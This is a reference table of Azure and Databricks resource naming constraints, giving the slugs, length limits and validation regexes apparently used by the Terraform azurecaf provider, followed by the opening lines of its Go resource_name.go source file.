| azurerm_automation_credential| aacred| 1| 128| false| "^[^<>*%:.?\\+\\/]{0,127}[^<>*%:.?\\+\\/ ]$"|
| azurerm_automation_runbook| aarun| 1| 63| false| "^[a-zA-Z][a-zA-Z0-9-]{0,62}$"|
| azurerm_automation_schedule| aasched| 1| 128| false| "^[^<>*%:.?\\+\\/]{0,127}[^<>*%:.?\\+\\/ ]$"|
| azurerm_automation_variable| aavar| 1| 128| false| "^[^<>*%:.?\\+\\/]{0,127}[^<>*%:.?\\+\\/ ]$"|
| azurerm_batch_account| ba| 3| 24| true| "^[a-z0-9]{3,24}$"|
| azurerm_batch_application| baapp| 1| 64| false| "^[a-zA-Z0-9_-]{1,64}$"|
| azurerm_batch_certificate| bacert| 5| 45| false| "^[a-zA-Z0-9_-]{5,45}$"|
| azurerm_batch_pool| bapool| 3| 24| false| "^[a-zA-Z0-9_-]{1,24}$"|
| azurerm_bot_web_app| bot| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,63}$"|
| azurerm_bot_channel_Email| botmail| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,63}$"|
| azurerm_bot_channel_ms_teams| botteams| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,63}$"|
| azurerm_bot_channel_slack| botslack| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,63}$"|
| azurerm_bot_channel_directline| botline| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,63}$"|
| azurerm_bot_channels_registration| botchan| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,63}$"|
| azurerm_bot_connection| botcon| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,63}$"|
| azurerm_redis_cache| redis| 1| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{0,61}[a-zA-Z0-9]$"|
| azurerm_redis_firewall_rule| redisfw| 1| 256| false| "^[a-zA-Z0-9]{1,256}$"|
| azurerm_cdn_profile| cdnprof| 1| 260| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{0,258}[a-zA-Z0-9]$"|
| azurerm_cdn_endpoint| cdn| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{0,48}[a-zA-Z0-9]$"|
| azurerm_cognitive_account| cog| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{0,63}$"|
| azurerm_availability_set| avail| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{0,78}[a-zA-Z0-9_]$"|
| azurerm_disk_encryption_set| des| 1| 80| false| "^[a-zA-Z0-9_]{1,80}$"|
| azurerm_image| img| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{0,78}[a-zA-Z0-9_]$"|
| azurerm_linux_virtual_machine| vm| 1| 64| false| "^[^\\/\"\\[\\]:|<>+=;,?*@&_][^\\/\"\\[\\]:|<>+=;,?*@&]{0,62}[^\\/\"\\[\\]:|<>+=;,?*@&.-]$"|
| azurerm_linux_virtual_machine_scale_set| vmss| 1| 64| false| "^[^\\/\"\\[\\]:|<>+=;,?*@&_][^\\/\"\\[\\]:|<>+=;,?*@&]{0,62}[^\\/\"\\[\\]:|<>+=;,?*@&.-]$"|
| azurerm_managed_disk| dsk| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9_.-]{0,78}[a-zA-Z0-9_]$"|
| azurerm_virtual_machine| vm| 1| 15| false| "^[^\\/\"\\[\\]:|<>+=;,?*@&_][^\\/\"\\[\\]:|<>+=;,?*@&]{0,13}[^\\/\"\\[\\]:|<>+=;,?*@&.-]$"|
| azurerm_virtual_machine_scale_set| vmss| 1| 15| false| "^[^\\/\"\\[\\]:|<>+=;,?*@&_][^\\/\"\\[\\]:|<>+=;,?*@&]{0,13}[^\\/\"\\[\\]:|<>+=;,?*@&.-]$"|
| azurerm_windows_virtual_machine| vm| 1| 15| false| "^[^\\/\"\\[\\]:|<>+=;,?*@&_][^\\/\"\\[\\]:|<>+=;,?*@&]{0,13}[^\\/\"\\[\\]:|<>+=;,?*@&.-]$"|
| azurerm_windows_virtual_machine_scale_set| vmss| 1| 15| false| "^[^\\/\"\\[\\]:|<>+=;,?*@&_][^\\/\"\\[\\]:|<>+=;,?*@&]{0,13}[^\\/\"\\[\\]:|<>+=;,?*@&.-]$"|
| azurerm_containerGroups| cg| 1| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{0,61}[a-zA-Z0-9]$"|
| azurerm_container_app| ca| 1| 32| true| "^[a-z0-9][a-z0-9-]{0,30}[a-z0-9]$"|
| azurerm_container_app_environment| cae| 1| 60| false| "^[0-9A-Za-z][0-9A-Za-z-]{0,58}[0-9a-zA-Z]$"|
| azurerm_container_registry| cr| 1| 63| true| "^[a-zA-Z0-9]{1,63}$"|
| azurerm_container_registry_webhook| crwh| 1| 50| false| "^[a-zA-Z0-9]{1,50}$"|
| azurerm_kubernetes_cluster| aks| 1| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{0,61}[a-zA-Z0-9]$"|
| azurerm_cosmosdb_account| cosmos| 1| 63| false| "^[a-z0-9][a-zA-Z0-9-_.]{0,61}[a-zA-Z0-9]$"|
| azurerm_custom_provider| prov| 3| 64| false| "^[^&%?\\/]{2,63}[^&%.?\\/ ]$"|
| azurerm_mariadb_server| maria| 3| 63| false| "^[a-z0-9][a-zA-Z0-9-]{1,61}[a-z0-9]$"|
| azurerm_mariadb_firewall_rule| mariafw| 1| 128| false| "^[a-zA-Z0-9-_]{1,128}$"|
| azurerm_mariadb_database| mariadb| 1| 63| false| "^[a-zA-Z0-9-_]{1,63}$"|
| azurerm_mariadb_virtual_network_rule| mariavn| 1| 128| false| "^[a-zA-Z0-9-_]{1,128}$"|
| azurerm_mysql_server| mysql| 3| 63| false| "^[a-z0-9][a-zA-Z0-9-]{1,61}[a-z0-9]$"|
| azurerm_mysql_firewall_rule| mysqlfw| 1| 128| false| "^[a-zA-Z0-9-_]{1,128}$"|
| azurerm_mysql_database| mysqldb| 1| 63| false| "^[a-zA-Z0-9-_]{1,63}$"|
| azurerm_mysql_virtual_network_rule| mysqlvn| 1| 128| false| "^[a-zA-Z0-9-_]{1,128}$"|
| azurerm_postgresql_server| psql| 3| 63| false| "^[a-z0-9][a-zA-Z0-9-]{1,61}[a-z0-9]$"|
| azurerm_postgresql_firewall_rule| psqlfw| 1| 128| false| "^[a-zA-Z0-9-_]{1,128}$"|
| azurerm_postgresql_database| psqldb| 1| 63| false| "^[a-zA-Z0-9-_]{1,63}$"|
| azurerm_postgresql_virtual_network_rule| psqlvn| 1| 128| false| "^[a-zA-Z0-9-_]{1,128}$"|
| azurerm_database_migration_project| migr| 2| 57| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,56}$"|
| azurerm_database_migration_service| dms| 2| 62| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,61}$"|
| azurerm_databricks_workspace| dbw| 3| 30| false| "^[a-zA-Z0-9-_]{3,30}$"|
| azurerm_kusto_cluster| kc| 4| 22| false| "^[a-z][a-z0-9]{3,21}$"|
| azurerm_kusto_database| kdb| 1| 260| false| "^[a-zA-Z0-9- .]{1,260}$"|
| azurerm_kusto_eventhub_data_connection| kehc| 1| 40| false| "^[a-zA-Z0-9- .]{1,40}$"|
| azurerm_data_factory| adf| 3| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,61}[a-zA-Z0-9]$"|
| azurerm_data_factory_dataset_mysql| adfmysql| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,258}[a-zA-Z0-9]$"|
| azurerm_data_factory_dataset_postgresql| adfpsql| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,258}[a-zA-Z0-9]$"|
| azurerm_data_factory_dataset_sql_server_table| adfmssql| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,258}[a-zA-Z0-9]$"|
| azurerm_data_factory_integration_runtime_managed| adfir| 3| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,61}[a-zA-Z0-9]$"|
| azurerm_data_factory_pipeline| adfpl| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,258}[a-zA-Z0-9]$"|
| azurerm_data_factory_linked_service_data_lake_storage_gen2| adfsvst| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,259}$"|
| azurerm_data_factory_linked_service_key_vault| adfsvkv| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,259}$"|
| azurerm_data_factory_linked_service_mysql| adfsvmysql| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,259}$"|
| azurerm_data_factory_linked_service_postgresql| adfsvpsql| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,259}$"|
| azurerm_data_factory_linked_service_sql_server| adfsvmssql| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,259}$"|
| azurerm_data_factory_trigger_schedule| adftg| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,259}$"|
| azurerm_data_lake_analytics_account| dla| 3| 24| false| "^[a-z0-9]{3,24}$"|
| azurerm_data_lake_analytics_firewall_rule| dlfw| 3| 50| false| "^[a-z0-9-_]{3,50}$"|
| azurerm_data_lake_store| dls| 3| 24| false| "^[a-z0-9]{3,24}$"|
| azurerm_data_lake_store_firewall_rule| dlsfw| 3| 50| false| "^[a-zA-Z0-9-_]{3,50}$"|
| azurerm_dev_test_lab| lab| 1| 50| false| "^[a-zA-Z0-9-_]{1,50}$"|
| azurerm_dev_test_linux_virtual_machine| labvm| 1| 64| false| "^[a-zA-Z0-9-]{1,64}$"|
| azurerm_dev_test_windows_virtual_machine| labvm| 1| 15| false| "^[a-zA-Z0-9-]{1,15}$"|
| azurerm_frontdoor| fd| 5| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{3,62}[a-zA-Z0-9]$"|
| azurerm_frontdoor_firewall_policy| fdfw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_hdinsight_hadoop_cluster| hadoop| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_hdinsight_hbase_cluster| hbase| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_hdinsight_kafka_cluster| kafka| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_hdinsight_interactive_query_cluster| iqr| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_hdinsight_ml_services_cluster| mls| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_hdinsight_rserver_cluster| rser| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_hdinsight_spark_cluster| spark| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_hdinsight_storm_cluster| storm| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_iotcentral_application| iotapp| 2| 63| true| "^[a-z0-9][a-z0-9-]{0,61}[a-z0-9]$"|
| azurerm_iothub| iot| 3| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,48}[a-z0-9]$"|
| azurerm_iothub_consumer_group| iotcg| 1| 50| false| "^[a-zA-Z0-9-._]{1,50}$"|
| azurerm_iothub_dps| dps| 3| 64| false| "^[a-zA-Z0-9-]{1,63}[a-zA-Z0-9]$"|
| azurerm_iothub_dps_certificate| dpscert| 1| 64| false| "^[a-zA-Z0-9-._]{1,64}$"|
| azurerm_key_vault| kv| 3| 24| false| "^[a-zA-Z][a-zA-Z0-9-]{1,22}[a-zA-Z0-9]$"|
| azurerm_key_vault_key| kvk| 1| 127| false| "^[a-zA-Z0-9-]{1,127}$"|
| azurerm_key_vault_secret| kvs| 1| 127| false| "^[a-zA-Z0-9-]{1,127}$"|
| azurerm_key_vault_certificate| kvc| 1| 127| false| "^[a-zA-Z0-9-]{1,127}$"|
| azurerm_lb| lb| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_lb_nat_rule| lbnatrl| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_public_ip| pip| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_public_ip_prefix| pippf| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_route| rt| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_route_table| route| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_subnet| snet| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_traffic_manager_profile| traf| 1| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-.]{0,61}[a-zA-Z0-9_]$"|
| azurerm_virtual_wan| vwan| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_virtual_network| vnet| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,62}[a-zA-Z0-9_]$"|
| azurerm_virtual_network_gateway| vgw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_virtual_network_peering| vpeer| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_network_interface| nic| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_firewall| fw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_eventhub| evh| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_eventhub_namespace| ehn| 1| 50| false| "^[a-zA-Z][a-zA-Z0-9-]{0,48}[a-zA-Z0-9]$"|
| azurerm_eventhub_authorization_rule| ehar| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_eventhub_namespace_authorization_rule| ehnar| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_eventhub_namespace_disaster_recovery_config| ehdr| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_eventhub_consumer_group| ehcg| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_stream_analytics_job| asa| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_function_javascript_udf| asafunc| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_output_blob| asaoblob| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_output_mssql| asaomssql| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_output_eventhub| asaoeh| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_output_servicebus_queue| asaosbq| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_output_servicebus_topic| asaosbt| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_reference_input_blob| asarblob| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_stream_input_blob| asaiblob| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_stream_input_eventhub| asaieh| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_stream_input_iothub| asaiiot| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_shared_image_gallery| sig| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9.]{0,78}[a-zA-Z0-9]$"|
| azurerm_shared_image| si| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9]$"|
| azurerm_snapshots| snap| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_storage_account| st| 3| 24| true| "^[a-z0-9]{3,24}$"|
| azurerm_storage_container| stct| 3| 63| false| "^[a-z0-9][a-z0-9-]{2,62}$"|
| azurerm_storage_data_lake_gen2_filesystem| stdl| 3| 63| false| "^[a-z0-9][a-z0-9-]{1,61}[a-z0-9]$"|
| azurerm_storage_queue| stq| 3| 63| false| "^[a-z0-9][a-z0-9-]{1,61}[a-z0-9]$"|
| azurerm_storage_table| stt| 3| 63| false| "^[a-z0-9][a-z0-9-]{1,61}[a-z0-9]$"|
| azurerm_storage_share| sts| 3| 63| false| "^[a-z0-9][a-z0-9-]{1,61}[a-z0-9]$"|
| azurerm_storage_share_directory| sts| 3| 63| false| "^[a-z0-9][a-z0-9-]{1,61}[a-z0-9]$"|
| azurerm_machine_learning_workspace| mlw| 1| 260| false| "^[^<>*%:.?\\+\\/]{0,259}[^<>*%:.?\\+\\/ ]$"|
| azurerm_storage_blob| blob| 1| 1024| false| "^[^\\s\\/$#&]{1,1000}[^\\s\\/$#&]{0,24}$"|
| azurerm_bastion_host| snap| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_local_network_gateway| lgw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_application_gateway| agw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_express_route_gateway| ergw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_express_route_circuit| erc| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_point_to_site_vpn_gateway| vpngw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_template_deployment| deploy| 1| 64| false| "^[a-zA-Z0-9-._\\(\\)]{1,64}$"|
| azurerm_sql_server| sql| 1| 63| true| "^[a-z0-9][a-z0-9-]{0,61}[a-z0-9]$"|
| azurerm_mssql_server| sql| 1| 63| true| "^[a-z0-9][a-z0-9-]{0,61}[a-z0-9]$"|
| azurerm_mssql_database| sqldb| 1| 128| false| "^[^<>*%:.?\\+\\/]{1,127}[^<>*%:.?\\+\\/ ]$"|
| azurerm_sql_elasticpool| sqlep| 1| 128| false| "^[^<>*%:.?\\+\\/]{1,127}[^<>*%:.?\\+\\/ ]$"|
| azurerm_mssql_elasticpool| sqlep| 1| 128| false| "^[^<>*%:.?\\+\\/]{1,127}[^<>*%:.?\\+\\/ ]$"|
| azurerm_sql_failover_group| sqlfg| 1| 63| true| "^[a-z0-9][a-z0-9-]{0,61}[a-z0-9]$"|
| azurerm_sql_firewall_rule| sqlfw| 1| 128| false| "^[^<>*%:?\\+\\/]{1,127}[^<>*%:.?\\+\\/]$"|
| azurerm_log_analytics_workspace| log| 4| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{2,61}[a-zA-Z0-9]$"|
| azurerm_service_fabric_cluster| sf| 4| 23| true| "^[a-z][a-z0-9-]{2,21}[a-z0-9]$"|
| azurerm_maps_account| map| 1| 98| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,97}$"|
| azurerm_network_watcher| nw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_resource_group| rg| 1| 90| false| "^[a-zA-Z0-9-._\\(\\)]{0,89}[a-zA-Z0-9-_\\(\\)]$"|
| azurerm_network_security_group| nsg| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_network_security_group_rule| nsgr| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_network_security_rule| nsgr| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_application_security_group| asg| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_zone| dns| 1| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,61}[a-zA-Z0-9_]$"|
| azurerm_private_dns_zone| pdns| 1| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,61}[a-zA-Z0-9_]$"|
| azurerm_notification_hub| nh| 1| 260| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,259}$"|
| azurerm_notification_hub_namespace| dnsrec| 6| 50| false| "^[a-zA-Z][a-zA-Z0-9-]{4,48}[a-zA-Z0-9]$"|
| azurerm_notification_hub_authorization_rule| dnsrec| 1| 256| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,255}$"|
| azurerm_servicebus_namespace| sb| 6| 50| false| "^[a-zA-Z][a-zA-Z0-9-]{4,48}[a-zA-Z0-9]$"|
| azurerm_servicebus_namespace_authorization_rule| sbar| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_servicebus_queue| sbq| 1| 260| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,258}[a-zA-Z0-9_]$"|
| azurerm_servicebus_queue_authorization_rule| sbqar| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_servicebus_subscription| sbs| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_servicebus_subscription_rule| sbsr| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_servicebus_topic| sbt| 1| 260| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,258}[a-zA-Z0-9]$"|
| azurerm_servicebus_topic_authorization_rule| dnsrec| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_powerbi_embedded| pbi| 3| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{2,62}$"|
| azurerm_dashboard| dsb| 3| 160| false| "^[a-zA-Z0-9-]{3,160}$"|
| azurerm_signalr_service| sgnlr| 3| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,61}[a-zA-Z0-9]$"|
| azurerm_eventgrid_domain| egd| 3| 50| false| "^[a-zA-Z0-9-]{3,50}$"|
| azurerm_eventgrid_domain_topic| egdt| 3| 50| false| "^[a-zA-Z0-9-]{3,50}$"|
| azurerm_eventgrid_event_subscription| egs| 3| 64| false| "^[a-zA-Z0-9-]{3,64}$"|
| azurerm_eventgrid_topic| egt| 3| 50| false| "^[a-zA-Z0-9-]{3,50}$"|
| azurerm_relay_namespace| rln| 6| 50| false| "^[a-zA-Z][a-zA-Z0-9-]{4,48}[a-zA-Z0-9]$"|
| azurerm_relay_hybrid_connection| rlhc| 1| 260| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,258}[a-zA-Z0-9]$"|
The following resource types are defined outside of the official documentation (see `resourceDefinition_out_of_docs.json`):
| azurerm_private_endpoint| pe| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_service_connection| psc| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_firewall_ip_configuration| fwipconf| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_firewall_application_rule_collection| fwapp| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_firewall_nat_rule_collection| fwnatrc| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_firewall_network_rule_collection| fwnetrc| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_a_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_aaaa_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_caa_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_cname_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_mx_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_ns_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_ptr_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_txt_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_a_record| pdnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_aaaa_record| pdnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_cname_record| pdnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_mx_record| pdnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_ptr_record| pdnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_srv_record| pdnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_txt_record| pdnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_virtual_machine_extension| vmx| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_virtual_machine_scale_set_extension| vmssx| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_network_ddos_protection_plan| ddospp| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_zone_group| pdnszg| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_proximity_placement_group| ppg| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_link_service| pls| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| databricks_cluster| dbc| 3| 30| false| "^[a-zA-Z0-9-_]{3,30}$"|
| databricks_standard_cluster| dbsc| 3| 30| false| "^[a-zA-Z0-9-_]{3,30}$"|
| databricks_high_concurrency_cluster| dbhcc| 3| 30| false| "^[a-zA-Z0-9-_]{3,30}$"|
<file_sep>/azurecaf/resource_name.go
package azurecaf
import (
"context"
"fmt"
"regexp"
"strings"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/schema"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/validation"
)
// resourceNameV2 returns the version-2 schema of the azurecaf_name resource.
// It is retained only so Terraform can decode old v2 state during the state
// upgrade to schema version 3 (see StateUpgraders in resourceName below);
// note it lacks the "use_slug" attribute added in v3.
func resourceNameV2() *schema.Resource {
// Collect every known resource-type key so resource_type(s) can be validated.
